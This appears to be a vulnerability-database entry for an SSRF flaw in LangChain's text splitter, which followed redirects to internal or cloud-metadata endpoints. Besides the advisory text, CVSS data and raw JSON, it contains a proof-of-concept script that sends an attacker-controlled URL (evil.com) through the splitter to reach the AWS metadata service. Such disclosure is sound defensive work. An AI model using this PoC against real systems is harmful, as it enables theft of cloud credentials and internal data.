Security Vulnerability Report
中文
CVE-2026-41481 CVSS 6.5 MEDIUM

CVE-2026-41481

Published: 2026-04-24 21:16:19
Last Modified: 2026-04-28 15:43:14

Description

LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. This vulnerability is fixed in 1.1.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:* - VULNERABLE
langchain-text-splitters < 1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC Concept for CVE-2026-41481 # This script demonstrates how an attacker might trigger the SSRF. # It requires a vulnerable version of langchain-text-splitters (< 1.1.2) from langchain_text_splitters import HTMLHeaderTextSplitter # The attacker controls 'evil.com' and configures it to redirect # requests to an internal metadata service (e.g., AWS IMDS) attacker_controlled_url = "http://evil.com/redirect_to_metadata" def exploit_ssrf(): try: # Initialize the splitter splitter = HTMLHeaderTextSplitter() # The vulnerable function validates 'attacker_controlled_url' (passes), # but follows the redirect to http://169.254.169.254/latest/meta-data/ print(f"[*] Attempting to split text from URL: {attacker_controlled_url}") # In vulnerable versions, this triggers the SSRF docs = splitter.split_text_from_url(attacker_controlled_url) print("[+] Request successful. Data retrieved:") for doc in docs: # If the app prints this back, data is exfiltrated print(doc.page_content) except Exception as e: print(f"[-] Exploit failed or error occurred: {e}") if __name__ == "__main__": exploit_ssrf()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41481", "sourceIdentifier": "[email protected]", "published": "2026-04-24T21:16:19.490", "lastModified": "2026-04-28T15:43:13.700", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "LangChain is a framework for building agents and LLM-powered applications. Prior to langchain-text-splitters\n 1.1.2, HTMLHeaderTextSplitter.split_text_from_url() validated the initial URL using validate_safe_url() but then performed the fetch with requests.get() with redirects enabled (the default). Because redirect targets were not revalidated, a URL pointing to an attacker-controlled server could redirect to internal, localhost, or cloud metadata endpoints, bypassing SSRF protections. The response body is parsed and returned as Document objects to the calling application code. Whether this constitutes a data exfiltration path depends on the application: if it exposes Document contents (or derivatives) back to the requester who supplied the URL, sensitive data from internal endpoints could be leaked. Applications that store or process Documents internally without returning raw content to the requester are not directly exposed to data exfiltration through this issue. This vulnerability is fixed in 1.1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:langchain:langchain-text-splitters:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.1.2", "matchCriteriaId": "6B5FD4DD-C579-4824-8988-4C702E1B2D24"}]}]}], "references": [{"url": "https://github.com/langchain-ai/langchain/security/advisories/GHSA-fv5p-p927-qmxr", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}